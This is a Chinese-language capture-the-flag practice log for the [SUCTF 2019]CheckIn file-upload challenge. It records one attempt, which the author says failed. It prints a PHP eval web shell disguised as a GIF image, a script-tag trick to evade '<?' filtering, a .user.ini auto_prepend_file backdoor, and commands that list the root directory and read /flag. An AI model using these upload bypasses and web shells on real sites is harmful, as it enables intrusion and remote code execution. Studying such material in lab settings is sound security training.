练习 9 Web [SUCTF 2019]CheckIn (未拿到flag)

离暑假还有41天2024-03-21 7:08

上传图片格式的木马文件：

返回 <? in contents!,存在PHP代码检测

上传非图片格式文件：

返回不允许非image

修改木马PHP代码规避检测

php 复制代码

<? ?> 改为 < script language="php">< /script >

<?php @eval($_POST['shell']);?> 

<script language='php'>@eval($_POST['shell']);</script>

上传强行加上gif文件头的GIF图片木马

php 复制代码

GIF89a?<script language='php'>@eval($_POST['shell']);</script>

返回如下内容：上传文件位置

现在传上去，因为还是图片格式文件，没有办法执行

尝试在"练习5"中提到的.htaccess文件，发现也被过滤了

卡住，搜索其他wp

新内容：user.ini文件
$SUCTF 2019$ CheckIn 1
user.ini文件构成的PHP后门
 BUUCTF | $SUCTF 2019$ CheckIn

因为本题过滤非图片格式，所以必须加上前面的"GIF89a"

php 复制代码

GIF89a                  //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称，并包含该文件，就像使用require函数调用它一样。
auto_append_file=a.jpg  //解析后进行包含

uploads/18de044ce1c88142786756f6f8015474/index.php

cmd=var_dump(scandir("/"));

cmd=var_dump(file_get_contents("/flag"));

但最后始终刷不出来，不知道什么情况，蚁剑也死活连不上